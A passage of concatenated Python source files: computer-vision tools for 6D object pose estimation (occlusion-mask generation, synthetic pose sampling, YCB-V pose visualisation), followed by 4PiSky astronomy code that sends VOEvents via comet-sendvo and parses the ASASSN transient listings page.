obj_annotations = {obj: [] for obj in objs}
for det in dets_i:
obj_id = det["obj_id"]
# NOTE: need to prepare init poses into this format
pose_est = np.array(det["pose_est"], dtype=np.float32).reshape(3, 4)
bbox_est = det.get("bbox_est", None) # xywh or None
time = det.get("time", 0.0)
score = det.get("score", 1.0)
if score < score_thr:
continue
obj_name = data_ref.id2obj[obj_id]
if obj_name not in objs: # detected obj is not interested
continue
if train_objs is not None: # not in trained objects
if obj_name not in train_objs:
continue
label = objs.index(obj_name)
inst = {
"category_id": label,
"pose_est": pose_est,
"score": score,
"time": time,
"model_info": models_info[str(obj_id)], # TODO: maybe just load this in the main function
}
if bbox_est is not None: # if None, compute bboxes from poses and 3D points later
inst["bbox_est"] = bbox_est
inst["bbox_mode"] = BoxMode.XYWH_ABS
obj_annotations[obj_name].append(inst)
for obj, cur_annos in obj_annotations.items():
scores = [ann["score"] for ann in cur_annos]
sel_annos = [ann for _, ann in sorted(zip(scores, cur_annos), key=lambda pair: pair[0], reverse=True)][
:top_k_per_obj
]
annotations.extend(sel_annos)
# NOTE: maybe [], no initial poses
record["annotations"] = annotations
return dataset_dicts
def my_build_batch_data_loader(dataset, sampler, total_batch_size, *, aspect_ratio_grouping=False, num_workers=0):
"""Build a batched dataloader for training.
Args:
dataset (torch.utils.data.Dataset): map-style PyTorch dataset. Can be indexed.
sampler (torch.utils.data.sampler.Sampler): a sampler that produces indices
total_batch_size, aspect_ratio_grouping, num_workers): see
:func:`build_detection_train_loader`.
Returns:
iterable[list]. Length of each list is the batch size of the current
GPU. Each element in the list comes from the dataset.
"""
world_size = comm.get_world_size()
assert (
total_batch_size > 0 and total_batch_size % world_size == 0
), "Total batch size ({}) must be divisible by the number of gpus ({}).".format(total_batch_size, world_size)
batch_size = total_batch_size // world_size
# Horovod: limit # of CPU threads to be used per worker.
if num_workers > 0:
torch.set_num_threads(num_workers)
kwargs = {"num_workers": num_workers}
# When supported, use 'forkserver' to spawn dataloader workers instead of 'fork' to prevent
# issues with Infiniband implementations that are not fork-safe
# https://github.com/horovod/horovod/blob/master/examples/pytorch/pytorch_imagenet_resnet50.py
# if (num_workers > 0 and hasattr(mp, '_supports_context') and
# mp._supports_context and 'forkserver' in mp.get_all_start_methods()):
# kwargs['multiprocessing_context'] = 'forkserver'
if aspect_ratio_grouping:
data_loader = torch.utils.data.DataLoader(
dataset,
sampler=sampler,
batch_sampler=None,
collate_fn=operator.itemgetter(0), # don't batch, but yield individual elements
worker_init_fn=worker_init_reset_seed,
#pin_memory=True,
**kwargs,
) # yield individual mapped dict
return AspectRatioGroupedDataset(data_loader, batch_size)
else:
batch_sampler = torch.utils.data.sampler.BatchSampler(
sampler, batch_size, drop_last=True
) # drop_last so the batch always have the same size
return torch.utils.data.DataLoader(
dataset,
batch_sampler=batch_sampler,
collate_fn=trivial_batch_collator,
worker_init_fn=worker_init_reset_seed,
#pin_memory=True,
**kwargs,
)
```
#### File: gdrn_selfocc_modeling/tools/generate_Q0.py
```python
import sys
sys.path.append('../')
import numpy as np
from PIL import Image, ImageFile
import os
import matplotlib.image as mp
from plyfile import PlyData
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import mmcv
import ref
# 把mask信息读进来
def read_mask_np(mask_pth): # 读取mask文件, 转换成0-1文件的整数
mask = Image.open(mask_pth).convert('1')
mask_seg = np.array(mask).astype(np.int32)
return mask_seg
# 需要知道物体的外接矩形信息,在那个models_info.json里面
def read_rec(model_info_path, obj_name):
id = ref.lm_full.obj2id[obj_name]
id = str(id)
model_info = mmcv.load(model_info_path)
diameter = model_info[id]["diameter"]
x_min, x_size = model_info[id]["min_x"], model_info[id]["size_x"]
y_min, y_size = model_info[id]["min_y"], model_info[id]["size_y"]
z_min, z_size = model_info[id]["min_z"], model_info[id]["size_z"]
return diameter, x_min, x_size, y_min, y_size, z_min, z_size
# 把pose信息整体加载进来,我们这个是一个object一个object来处理的
def read_pose_np(pose_path): # 读取对应的pose
pose_info = mmcv.load(pose_path)
return pose_info
def transformer(P0, R, t): # 计算P=Rp0+t
P0 = np.reshape(P0, [3, 1])
P = np.matmul(R, P0) + t
return P
def transformer_back(P, R, t): # 计算P0=RTP-RTt
P0 = np.matmul(R.T, P) - np.matmul(R.T, t)
return P0
def projector(P0, K, R, t): # 计算相机投影, 将P0经过R, t变换再投影到图像上
p = np.matmul(K, P0) / P0[2]
p = p[0:2, :] / p[2]
return p
def pointintriangle(A, B, C, P): # 判断一点是否在3角面片内部,ABC是三角面片3个点
P = np.expand_dims(P, 1)
v0 = C - A
v1 = B - A
v2 = P - A
dot00 = np.matmul(v0.T, v0)
dot01 = np.matmul(v0.T, v1)
dot02 = np.matmul(v0.T, v2)
dot11 = np.matmul(v1.T, v1)
dot12 = np.matmul(v1.T, v2)
inverdeno = 1 / (dot00 * dot11 - dot01 * dot01)
u = (dot11 * dot02 - dot01 * dot12) * inverdeno
if u < 0 or u > 1:
return False
v = (dot00 * dot12 - dot01 * dot02) * inverdeno
if v < 0 or v > 1:
return False
return u + v <= 1
def test_in_box(point, xmin, xmax, ymin, ymax, zmin, zmax, R, t):
# 要先将点坐标变换回去
point = np.matmul(R.T, point) - np.matmul(R.T, t)
# print(point)
if xmin < point[0] < xmax and ymin < point[1] < ymax and zmin < point[2] < zmax:
return 1, point
else:
return 0, 0
intrinsic_matrix = {
'linemod': np.array([[572.4114, 0., 325.2611],
[0., 573.57043, 242.04899],
[0., 0., 1.]]),
'blender': np.array([[700., 0., 320.],
[0., 700., 240.],
[0., 0., 1.]]),
'pascal': np.asarray([[-3000.0, 0.0, 0.0],
[0.0, 3000.0, 0.0],
[0.0, 0.0, 1.0]])
}
def estimate_occ_mask_Q0(rootdir, cls_name, scale=1000): # cls_name也就是objectname
# create basic path if not exist
id = ref.lm_full.obj2id[cls_name] # id, 物体的编号
basic_path = os.path.join(rootdir, "test/Q0/{:06d}".format(id))
if not os.path.exists(basic_path):
os.makedirs(basic_path)
img_dir = os.path.join(rootdir, "test", "{:06d}".format(id), "rgb")
img_num = len(os.listdir(img_dir)) # 得到图片的数量
model_info_path = os.path.join(rootdir, "models/models_info.json")
diameter, xmin, x_size, ymin, y_size, zmin, z_size = read_rec(model_info_path, cls_name)
xmax = xmin + x_size
ymax = ymin + y_size
zmax = zmin + z_size
xmin = xmin / scale
xmax = xmax / scale
ymin = ymin / scale
ymax = ymax / scale
zmin = zmin / scale
zmax = zmax / scale
pose_path = os.path.join(rootdir, "test/{:06d}".format(id), "scene_gt.json")
pose_info = read_pose_np(pose_path)
for k in range(img_num):
print(cls_name, k)
mask_path = os.path.join(rootdir, "test/{:06d}".format(id), "mask_visib", '{:06d}_000000.png'.format(k))
mask = read_mask_np(mask_path)
R, t = pose_info[str(k)][0]["cam_R_m2c"], pose_info[str(k)][0]["cam_t_m2c"]
R = np.array(R)
R = np.reshape(R, (3, 3)) # 重整一下形状
t = np.reshape(np.array(t), (3, 1)) / scale
# 需要把物体的4个坐标截取下来
xyz_info = os.path.join(rootdir, "test/xyz_crop/{:06d}".format(id), "{:06d}_000000.pkl".format(k))
xyz = mmcv.load(xyz_info)
x1, y1, x2, y2 = xyz["xyxy"]
camK = intrinsic_matrix['linemod'].copy()
camK_inv = np.linalg.inv(camK)
# 开始计算遮挡关系
# 开始循环
height, width = mask.shape
# 存储遮挡mask
occ_mask_x = np.zeros((height, width))
occ_mask_y = np.zeros((height, width))
occ_mask_z = np.zeros((height, width))
# 存储Q0的坐标
Q0_x = np.zeros((3, height, width))
Q0_y = np.zeros((3, height, width))
Q0_z = np.zeros((3, height, width))
n_x = np.array([[1], [0], [0]]) # Q0_yz
n_y = np.array([[0], [1], [0]]) # Q0_xz
n_z = np.array([[0], [0], [1]]) # Q0_xy
# 计算一些必要的量
RnxTt = np.matmul(np.matmul(R, n_x).T, t)
RnyTt = np.matmul(np.matmul(R, n_y).T, t)
RnzTt = np.matmul(np.matmul(R, n_z).T, t)
for i in range(height):
for j in range(width):
point = np.array([[j], [i], [1]])
if mask[i][j] < 1:
continue
else:
Q0_x_v = (RnxTt / np.matmul(np.matmul(R, n_x).T,
np.matmul(camK_inv, point))) * np.matmul(camK_inv, point)
occ_mask_x[i][j], Q_save = test_in_box(Q0_x_v, xmin, xmax, ymin, ymax, zmin, zmax, R, t)
if occ_mask_x[i][j] > 0:
Q0_x[:, i, j] = Q_save.squeeze()
Q0_y_v = (RnyTt / np.matmul(np.matmul(R, n_y).T,
np.matmul(camK_inv, point))) * np.matmul(camK_inv, point)
occ_mask_y[i][j], Q_save = test_in_box(Q0_y_v, xmin, xmax, ymin, ymax, zmin, zmax, R, t)
if occ_mask_y[i][j] > 0:
Q0_y[:, i, j] = Q_save.squeeze()
Q0_z_v = (RnzTt / np.matmul(np.matmul(R, n_z).T,
np.matmul(camK_inv, point))) * np.matmul(camK_inv, point)
occ_mask_z[i][j], Q_save = test_in_box(Q0_z_v, xmin, xmax, ymin, ymax, zmin, zmax, R, t)
if occ_mask_z[i][j] > 0:
Q0_z[:, i, j] = Q_save.squeeze()
# 生成Q0的坐标
# get Q0
# show the result
'''
pic_point = Q0_z[:, occ_mask_z.astype(np.bool)]
pic_point = pic_point.T
plt.figure("3D scatter", facecolor="lightgray")
ax3d = plt.gca(projection="3d")
x = pic_point[:, 0]
y = pic_point[:, 1]
z = pic_point[:, 2]
ax3d.scatter(x, y, z, s=20, marker=".", cmap='spectral')
ax3d.set_xlabel("x label")
ax3d.set_ylabel("y_label")
ax3d.set_zlabel("z_label")
plt.show()
'''
Q0 = np.concatenate((Q0_x[1:, :, :], Q0_y[0:1, :, :], Q0_y[2:, :, :], Q0_z[:2, :, :]), axis=0)
# CHW - HWC
Q0 = Q0.transpose((1, 2, 0))
Q0 = {
"occ_crop": Q0[y1:y2 + 1, x1:x2 + 1, :],
"xyxy": [x1, y1, x2, y2],
}
# 存储 Q0的坐标
outpath = os.path.join(rootdir, "test/Q0/{:06d}".format(id), '{:06d}_000000.pkl'.format(k))
mmcv.dump(Q0, outpath)
def run_lm_q0():
root_dir = "/data/wanggu/Storage/BOP_DATASETS/lm"
obj_name = [
"ape",
"benchvise",
"bowl",
"camera",
"can",
"cat",
"cup",
"driller",
"duck",
"eggbox",
"glue",
"holepuncher",
"iron",
"lamp",
"phone"] # 15个分别处理
for cls_name in obj_name:
estimate_occ_mask_Q0(root_dir, cls_name)
if __name__ == "__main__":
root_dir = "/data/wanggu/Storage/BOP_DATASETS/lm"
obj_name = [
"ape",
"benchvise",
"bowl",
"camera",
"can",
"cat",
"cup",
"driller",
"duck",
"eggbox",
"glue",
"holepuncher",
"iron",
"lamp",
"phone"] # 15个分别处理
for cls_name in obj_name:
estimate_occ_mask_Q0(root_dir, cls_name)
```
#### File: gdrn_selfocc_modeling/tools/my_setup.py
```python
import logging
def setup_for_distributed(is_master):
"""This function disables printing when not in master process."""
import builtins as __builtin__
builtin_print = __builtin__.print
if not is_master:
logging.getLogger("core").setLevel("WARN")
logging.getLogger("d2").setLevel("WARN")
logging.getLogger("lib").setLevel("WARN")
logging.getLogger("my").setLevel("WARN")
def print(*args, **kwargs):
force = kwargs.pop("force", False)
if is_master or force:
builtin_print(*args, **kwargs)
__builtin__.print = print
```
#### File: tools/sphere_synt/sphere_synt_2_gen_pose.py
```python
import os.path as osp
import sys
from tqdm import tqdm
import math
import numpy as np
import random
import mmcv
cur_dir = osp.dirname(osp.abspath(__file__))
sys.path.insert(0, osp.join(cur_dir, "../../../../"))
from lib.pysixd import inout, misc, transform
import ref
from lib.utils.utils import dprint
random.seed(2333)
np.random.seed(2333)
if len(sys.argv) > 1:
split = sys.argv[1]
else:
raise RuntimeError("Usage: python this_file.py <split>(train/test)")
print("split: ", split)
ref_key = "sphere_synt"
data_ref = ref.__dict__[ref_key]
model_dir = data_ref.model_dir
id2obj = data_ref.id2obj
K = data_ref.camera_matrix
height = 480
width = 640
# parameters
scene = 1
# N_grid = 200
if split == "train":
seed = 2333
scene_dir = osp.join(data_ref.train_dir, f"{scene:06d}")
N_sample = 20000
# minNoiseSigma = 0
# maxNoiseSigma = 15
# minOutlier = 0
# maxOutlier = 0.3
else:
seed = 123
scene_dir = osp.join(data_ref.test_dir, f"{scene:06d}")
N_sample = 2000
print("random seed: ", seed)
random.seed(seed)
np.random.seed(seed)
mmcv.mkdir_or_exist(scene_dir)
trans_min = [-2, -2, 4]
trans_max = [2, 2, 8]
def my_rand(a, b):
return a + (b - a) * random.random()
def random_rotation():
range = 1
# use eular formulation, three different rotation angles on 3 axis
phi = my_rand(0, range * math.pi * 2)
theta = my_rand(0, range * math.pi)
psi = my_rand(0, range * math.pi * 2)
R0 = []
R0.append(math.cos(psi) * math.cos(phi) - math.cos(theta) * math.sin(phi) * math.sin(psi))
R0.append(math.cos(psi) * math.sin(phi) + math.cos(theta) * math.cos(phi) * math.sin(psi))
R0.append(math.sin(psi) * math.sin(theta))
R1 = []
R1.append(-math.sin(psi) * math.cos(phi) - math.cos(theta) * math.sin(phi) * math.cos(psi))
R1.append(-math.sin(psi) * math.sin(phi) + math.cos(theta) * math.cos(phi) * math.cos(psi))
R1.append(math.cos(psi) * math.sin(theta))
R2 = []
R2.append(math.sin(theta) * math.sin(phi))
R2.append(-math.sin(theta) * math.cos(phi))
R2.append(math.cos(theta))
R = []
R.append(R0)
R.append(R1)
R.append(R2)
return np.array(R)
def main():
vertex_scale = data_ref.vertex_scale
obj_id = 1
model_path = osp.join(model_dir, f"obj_{obj_id:06d}.ply")
# load the model to calculate bbox
model = inout.load_ply(model_path, vertex_scale=vertex_scale)
scene_gt_file = osp.join(scene_dir, "scene_gt.json")
scene_gt_info_file = osp.join(scene_dir, "scene_gt_info.json")
scene_gt_dict = {}
scene_gt_info_dict = {}
i = 0
progress_bar = mmcv.ProgressBar(N_sample)
while True:
# select grids randomly within the image plane
# sy = np.random.randint(height, size=N_grid)
# sx = np.random.randint(width, size=N_grid)
# rotation = transform.random_rotation_matrix()[:3, :3]
rotation = random_rotation()
tx = my_rand(trans_min[0], trans_max[0])
ty = my_rand(trans_min[1], trans_max[1])
tz = my_rand(trans_min[2], trans_max[2])
trans = np.array([tx, ty, tz]).reshape(-1)
pose = np.hstack([rotation, trans.reshape(3, 1)])
proj = (K @ trans.T).T
proj = proj[:2] / proj[2] # ox, oy
if proj[0] < 48 or width - proj[0] < 48 or proj[1] < 48 or height - proj[1] < 48:
dprint(f"skip invalid pose, too close to border, projected center: {proj}")
continue
bbox = misc.compute_2d_bbox_xywh_from_pose(model["pts"], pose, K, width=640, height=480, clip=True).tolist()
x, y, w, h = bbox
if w < 10 or h < 10:
dprint(f"skip invalid pose, w: {w}, h: {h}")
continue
inst = {
"cam_R_m2c": rotation.flatten().tolist(),
"cam_t_m2c": (1000 * trans).flatten().tolist(), # m to mm
"obj_id": obj_id,
}
scene_gt_dict[str(i)] = [inst]
info = {"bbox_obj": bbox, "bbox_visib": bbox}
scene_gt_info_dict[str(i)] = [info]
i += 1
progress_bar.update()
if i >= N_sample:
break
inout.save_json(scene_gt_file, scene_gt_dict)
inout.save_json(scene_gt_info_file, scene_gt_info_dict)
print(scene_gt_file)
print(scene_gt_info_file)
if __name__ == "__main__":
main()
```
#### File: tools/ycbv/ycbv_3_vis_poses_full.py
```python
import mmcv
import os.path as osp
import numpy as np
import sys
from tqdm import tqdm
from detectron2.data import DatasetCatalog, MetadataCatalog
from detectron2.structures import BoxMode
import torch
import pandas as pd
cur_dir = osp.dirname(osp.abspath(__file__))
sys.path.insert(0, osp.join(cur_dir, "../../../../"))
from lib.vis_utils.colormap import colormap
from lib.utils.mask_utils import mask2bbox_xyxy, cocosegm2mask, get_edge
from core.utils.data_utils import read_image_mmcv
from core.gdrn_modeling.datasets.dataset_factory import register_datasets
from transforms3d.quaternions import quat2mat
from lib.egl_renderer.egl_renderer_v3 import EGLRenderer
score_thr = 0.3
colors = colormap(rgb=False, maximum=255)
# object info
id2obj = {
1: "002_master_chef_can", # [1.3360, -0.5000, 3.5105]
2: "003_cracker_box", # [0.5575, 1.7005, 4.8050]
3: "004_sugar_box", # [-0.9520, 1.4670, 4.3645]
4: "005_tomato_soup_can", # [-0.0240, -1.5270, 8.4035]
5: "006_mustard_bottle", # [1.2995, 2.4870, -11.8290]
6: "007_tuna_fish_can", # [-0.1565, 0.1150, 4.2625]
7: "008_pudding_box", # [1.1645, -4.2015, 3.1190]
8: "009_gelatin_box", # [1.4460, -0.5915, 3.6085]
9: "010_potted_meat_can", # [2.4195, 0.3075, 8.0715]
10: "011_banana", # [-18.6730, 12.1915, -1.4635]
11: "019_pitcher_base", # [5.3370, 5.8855, 25.6115]
12: "021_bleach_cleanser", # [4.9290, -2.4800, -13.2920]
13: "024_bowl", # [-0.2270, 0.7950, -2.9675]
14: "025_mug", # [-8.4675, -0.6995, -1.6145]
15: "035_power_drill", # [9.0710, 20.9360, -2.1190]
16: "036_wood_block", # [1.4265, -2.5305, 17.1890]
17: "037_scissors", # [7.0535, -28.1320, 0.0420]
18: "040_large_marker", # [0.0460, -2.1040, 0.3500]
19: "051_large_clamp", # [10.5180, -1.9640, -0.4745]
20: "052_extra_large_clamp", # [-0.3950, -10.4130, 0.1620]
21: "061_foam_brick", # [-0.0805, 0.0805, -8.2435]
}
objects = list(id2obj.values())
def load_predicted_csv(fname):
df = pd.read_csv(fname)
info_list = df.to_dict("records")
return info_list
def parse_Rt_in_csv(_item):
return np.array([float(i) for i in _item.strip(" ").split(" ")])
width = 640
height = 480
tensor_kwargs = {"device": torch.device("cuda"), "dtype": torch.float32}
image_tensor = torch.empty((height, width, 4), **tensor_kwargs).detach()
seg_tensor = torch.empty((height, width, 4), **tensor_kwargs).detach()
# image_tensor = torch.empty((480, 640, 4), **tensor_kwargs).detach()
model_dir = "datasets/BOP_DATASETS/ycbv/models/"
model_paths = [osp.join(model_dir, f"obj_{obj_id:06d}.ply") for obj_id in id2obj]
texture_paths = [osp.join(model_dir, f"obj_{obj_id:06d}.png") for obj_id in id2obj]
ren = EGLRenderer(
model_paths, texture_paths=texture_paths, vertex_scale=0.001, use_cache=True, width=width, height=height
)
# NOTE: this is for ycbv_bop_test
pred_path = "output/gdrn/ycbv/a6_cPnP_AugAAETrunc_BG0.5_ycbv_real_pbr_visib20_20e_allObjs/a6-cPnP-AugAAETrunc-BG0.5-ycbv-real-pbr-visib20-20e-singleObjMerged-bop-test-iter0_ycbv-test.csv"
vis_dir = "output/gdrn/ycbv/a6_cPnP_AugAAETrunc_BG0.5_ycbv_real_pbr_visib20_20e_allObjs/ycbv_test_keyframe/ycbv_vis_gt_pred_full"
mmcv.mkdir_or_exist(vis_dir)
print(pred_path)
preds_csv = load_predicted_csv(pred_path)
preds = {}
for item in preds_csv:
im_key = "{}/{}".format(item["scene_id"], item["im_id"])
item["time"] = float(item["time"])
item["score"] = float(item["score"])
item["R"] = parse_Rt_in_csv(item["R"]).reshape(3, 3)
item["t"] = parse_Rt_in_csv(item["t"]) / 1000
item["obj_name"] = id2obj[item["obj_id"]]
if im_key not in preds:
preds[im_key] = []
preds[im_key].append(item)
dataset_name = "ycbv_test"
print(dataset_name)
register_datasets([dataset_name])
meta = MetadataCatalog.get(dataset_name)
print("MetadataCatalog: ", meta)
objs = meta.objs
dset_dicts = DatasetCatalog.get(dataset_name)
for d in tqdm(dset_dicts):
K = d["cam"]
file_name = d["file_name"]
scene_im_id = d["scene_im_id"]
img = read_image_mmcv(file_name, format="BGR")
scene_im_id_split = d["scene_im_id"].split("/")
scene_id = scene_im_id_split[0]
im_id = int(scene_im_id_split[1])
imH, imW = img.shape[:2]
annos = d["annotations"]
masks = [cocosegm2mask(anno["segmentation"], imH, imW) for anno in annos]
fg_mask = sum(masks).astype("bool").astype("uint8")
minx, miny, maxx, maxy = mask2bbox_xyxy(fg_mask)
bboxes = [anno["bbox"] for anno in annos]
bbox_modes = [anno["bbox_mode"] for anno in annos]
bboxes_xyxy = np.array(
[BoxMode.convert(box, box_mode, BoxMode.XYXY_ABS) for box, box_mode in zip(bboxes, bbox_modes)]
)
quats = [anno["quat"] for anno in annos]
transes = [anno["trans"] for anno in annos]
Rs = [quat2mat(quat) for quat in quats]
# 0-based label
cat_ids = [anno["category_id"] for anno in annos]
obj_names = [objs[cat_id] for cat_id in cat_ids]
gt_Rs = []
gt_ts = []
gt_labels = []
for anno_i, anno in enumerate(annos):
obj_name = obj_names[anno_i]
gt_labels.append(objects.index(obj_name)) # 0-based label
gt_Rs.append(Rs[anno_i])
gt_ts.append(transes[anno_i])
if scene_im_id not in preds:
print(scene_im_id, "not detected")
continue
cur_preds = preds[scene_im_id]
kpts_2d_est = []
est_Rs = []
est_ts = []
est_labels = []
for pred_i, pred in enumerate(cur_preds):
try:
R_est = pred["R"]
t_est = pred["t"]
score = pred["score"]
obj_name = pred["obj_name"]
except:
continue
if score < score_thr:
continue
est_Rs.append(R_est)
est_ts.append(t_est)
est_labels.append(objects.index(obj_name)) # 0-based label
im_gray = mmcv.bgr2gray(img, keepdim=True)
im_gray_3 = np.concatenate([im_gray, im_gray, im_gray], axis=2)
gt_poses = [np.hstack([_R, _t.reshape(3, 1)]) for _R, _t in zip(gt_Rs, gt_ts)]
est_poses = [np.hstack([_R, _t.reshape(3, 1)]) for _R, _t in zip(est_Rs, est_ts)]
ren.render(est_labels, est_poses, K=K, image_tensor=image_tensor, background=im_gray_3)
ren_bgr = (image_tensor[:, :, :3].detach().cpu().numpy() + 0.5).astype("uint8")
for gt_label, gt_pose in zip(gt_labels, gt_poses):
ren.render([gt_label], [gt_pose], K=K, seg_tensor=seg_tensor)
gt_mask = (seg_tensor[:, :, 0].detach().cpu().numpy() > 0).astype("uint8")
gt_edge = get_edge(gt_mask, bw=3, out_channel=1)
ren_bgr[gt_edge != 0] = np.array(mmcv.color_val("blue"))
for est_label, est_pose in zip(est_labels, est_poses):
ren.render([est_label], [est_pose], K=K, seg_tensor=seg_tensor)
est_mask = (seg_tensor[:, :, 0].detach().cpu().numpy() > 0).astype("uint8")
est_edge = get_edge(est_mask, bw=3, out_channel=1)
ren_bgr[est_edge != 0] = np.array(mmcv.color_val("green"))
vis_im = ren_bgr
save_path_0 = osp.join(vis_dir, "{}_{:06d}_vis0.png".format(scene_id, im_id))
mmcv.imwrite(img, save_path_0)
save_path_1 = osp.join(vis_dir, "{}_{:06d}_vis1.png".format(scene_id, im_id))
mmcv.imwrite(vis_im, save_path_1)
# if True:
# # grid_show([img[:, :, ::-1], vis_im[:, :, ::-1]], ["im", "est"], row=1, col=2)
# # im_show = cv2.hconcat([img, vis_im, vis_im_add])
# im_show = cv2.hconcat([img, vis_im])
# cv2.imshow("im_est", im_show)
# if cv2.waitKey(0) == 27:
# break # esc to quit
# ffmpeg -r 5 -f image2 -s 1920x1080 -pattern_type glob -i "./ycbv_vis_gt_pred_full_video/*.png" -vcodec libx264 -crf 25 -pix_fmt yuv420p ycbv_vis_video.mp4
``` |
{
"source": "4pisky/fourpisky-core",
"score": 2
} |
#### File: fourpisky/comms/comet.py
```python
from __future__ import absolute_import
import logging
import subprocess
import voeventparse
import tempfile
import textwrap
logger = logging.getLogger(__name__)
def send_voevent(voevent, host='localhost', port=8098):
logger.debug("comet-sendvo voevent: {}".format(voevent.attrib['ivorn']))
tf = tempfile.TemporaryFile()
voeventparse.dump(voevent, tf)
tf.seek(0)
# tf.close()
try:
cmd = ['comet-sendvo']
cmd.append('--host=' + host)
cmd.append('--port=' + str(port))
output = subprocess.check_output(cmd, stdin=tf, )
except subprocess.CalledProcessError as e:
logger.error(f"send_voevent failed, output was: {e.output}")
raise e
return output
def dummy_send_to_comet_stub(voevent, host='localhost', port=8098):
tf = tempfile.NamedTemporaryFile(delete=False)
logmsg=textwrap.dedent("""\
*************
Would have sent a VOEvent to node: {host}:{port};
IVORN: {ivorn}
Copy of XML dumped to: {fname}
*************
""".format(host=host, port=port, ivorn=voevent.attrib['ivorn'],
fname=tf.name))
logger.debug(logmsg)
voeventparse.dump(voevent, tf)
tf.close()
# raise subprocess.CalledProcessError(1, 'dummyvosend')
```
#### File: fourpisky/feeds/asassn.py
```python
import lxml
import lxml.html
from collections import defaultdict
import voeventparse as vp
import datetime
import iso8601
from astropy.coordinates import SkyCoord
import astropy.units as u
from fourpisky.voevent import (
create_skeleton_4pisky_voevent,
asassn_alert_substream,
get_stream_ivorn_prefix,
)
from fourpisky.feeds.feedbase import FeedBase
import logging
logger = logging.getLogger(__name__)
ASSASN_BAD_IDS = [
'ASASSN-15uh', # Datestamp has been replaced with junk
'ASASSN-15co', # Datestamp has been replaced with junk
'Comet ASASSN1', # Moving object
]
ASASSN_TIMESTAMP_ID_MAP = {
'2013-09-14.53': 'iPTF13dge', # Malformed href in other id col.
}
ASASSN_EARLIEST_REPARSE_DATE=iso8601.parse_date("2017-10-18")
class AsassnFeed(FeedBase):
name = "ASASSN webpage"
url = "http://www.astronomy.ohio-state.edu/asassn/transients.html"
substream = asassn_alert_substream
stream_ivorn_prefix = get_stream_ivorn_prefix(substream)
hash_byte_range = (0, 10000)
hash_cache_path = None
# VOEvent details:
text_params_groupname = 'asassn_params'
url_params_groupname = 'asassn_urls'
def __init__(self, hash_cache_path=None):
super(AsassnFeed, self).__init__(hash_cache_path)
def generate_voevent(self, feed_id):
rowdict = self.event_id_data_map[feed_id]
params = rowdict['param']
urls = rowdict['url']
stream_id = self.feed_id_to_stream_id(feed_id)
v = create_skeleton_4pisky_voevent(substream=self.substream,
stream_id=stream_id,
role=vp.definitions.roles.observation,
date=datetime.datetime.utcnow()
)
vp.add_how(v, references=vp.Reference(uri=self.url))
v.How.Description = "Parsed from ASASSN listings page by 4PiSky-Bot."
timestamp_dt = asassn_timestamp_str_to_datetime(
params[AsassnKeys.detection_timestamp])
posn_sc = SkyCoord(params['ra'], params['dec'],
unit=(u.hourangle, u.deg))
# Couldn't find a formal analysis of positional accuracy, but
# http://dx.doi.org/10.1088/0004-637X/788/1/48
# states the angular resolution as 16 arcseconds, so we'll go with that.
err_radius_estimate = 16 * u.arcsec
posn_simple = vp.Position2D(ra=posn_sc.ra.deg,
dec=posn_sc.dec.deg,
err=err_radius_estimate.to(u.deg).value,
units=vp.definitions.units.degrees,
system=vp.definitions.sky_coord_system.utc_icrs_geo,
)
vp.add_where_when(
v,
coords=posn_simple,
obs_time=timestamp_dt,
observatory_location=vp.definitions.observatory_location.geosurface)
asassn_params = [vp.Param(key, params[key]) for key in
(AsassnKeys.id_asassn,
AsassnKeys.id_other,
AsassnKeys.detection_timestamp,
AsassnKeys.ra,
AsassnKeys.dec,
AsassnKeys.spec_class,
AsassnKeys.comment,
)
if key in params
]
if AsassnKeys.mag_v in params:
asassn_params.append(
vp.Param(AsassnKeys.mag_v, params[AsassnKeys.mag_v],
unit='mag', ucd="phot.mag",
)
)
if AsassnKeys.id_other in urls:
asassn_params.append(
vp.Param(AsassnKeys.id_other,
urls[AsassnKeys.id_other][0][0])
)
asassn_urls = [vp.Param(key, urls[key][0][1]) for key in urls]
v.What.append(vp.Group(params=asassn_params,
name=self.text_params_groupname))
v.What.append(vp.Group(params=asassn_urls,
name=self.url_params_groupname))
return v
def event_data_to_event_id(self, event_data):
"""
Derive a feed-specific identifier for a given event.
Args:
event_data: Feed specific datastructure, typically just a dictionary.
NB feed id should contain timestamp prefix followed by underscore,
we use this for deduplication.
(Even if the event details are updated the timestamp should remain the
same.)
"""
# OK. Fiddly date-string formatting. Aim here is to get a uniform
# date-time format so that anything ordered by IVORN will also
# be date-time ordered. Users can always check the XML content
# for the original ASSASSN timestamp-string.
# We parse-and-reformat the date-string to zero-pad the day digit as
# needed.
# Finally, we regenerate the 'decimal-days' suffix,
# fixed at 2 decimal places.
# (since some earlier events don't have this suffix at all we can't
# just tokenize it).
external_id = extract_asassn_id(event_data)
timestamp_input_string = event_data['param'][
AsassnKeys.detection_timestamp]
timestamp_dt = asassn_timestamp_str_to_datetime(
timestamp_input_string).replace(tzinfo=None)
uniform_date_str = timestamp_dt.strftime('%Y-%m-%d')
start_of_day = datetime.datetime(timestamp_dt.year,
timestamp_dt.month,
timestamp_dt.day
)
# Friday afternoon kludge:
day_fraction_float = (
(timestamp_dt - start_of_day).total_seconds() / 3600. / 24.
)
day_fraction_str = f"{day_fraction_float:.2f}"[1:]
feed_id = ''.join((uniform_date_str, day_fraction_str,
'_', external_id))
return feed_id
def get_ivorn_prefixes_for_duplicate(self, feed_id):
"""
Determines what a possible duplicate ivorn might be prefixed by.
For ASASSN - assumes timestamp unchanging even if the
event gets renamed. We match on the substream + timestamp
(i.e. everything up to the first underscore in the stream_id).
"""
stream_id = self.feed_id_to_stream_id(feed_id)
return [
self.stream_ivorn_prefix + stream_id.split('_', 1)[0],
]
def parse_content_to_event_data_list(self):
tree = lxml.html.fromstring(self.content)
events = transform_pagetree(tree)
return events
# ==========================================================================
def extract_asassn_id(rowdict):
params = rowdict['param']
urls = rowdict['url']
# print group_params
# print urls
# Check for known-bad rows, manually resolved:
timestamp = params[AsassnKeys.detection_timestamp]
if timestamp in ASASSN_TIMESTAMP_ID_MAP:
return ASASSN_TIMESTAMP_ID_MAP[timestamp]
# Now try to parse any vaguely reasonable data
asassn_id = params.get(AsassnKeys.id_asassn)
if asassn_id is not None:
if asassn_id.startswith('ASASSN') or asassn_id.startswith('ASASN'):
external_id = asassn_id
else:
raise ValueError(
f'Could not extract Id for row- unrecognised id format: {asassn_id}')
else:
# Ensure ASASSN ID is not something weird
assert asassn_id is None
# Then, look for alt-id
alt_id_text = params.get(AsassnKeys.id_other)
alt_id_url = urls.get(AsassnKeys.id_other)
# Otherwise, check for alt_id text:
if alt_id_text:
external_id = alt_id_text.strip()
elif alt_id_url:
first_url_text_href_pair = alt_id_url[0]
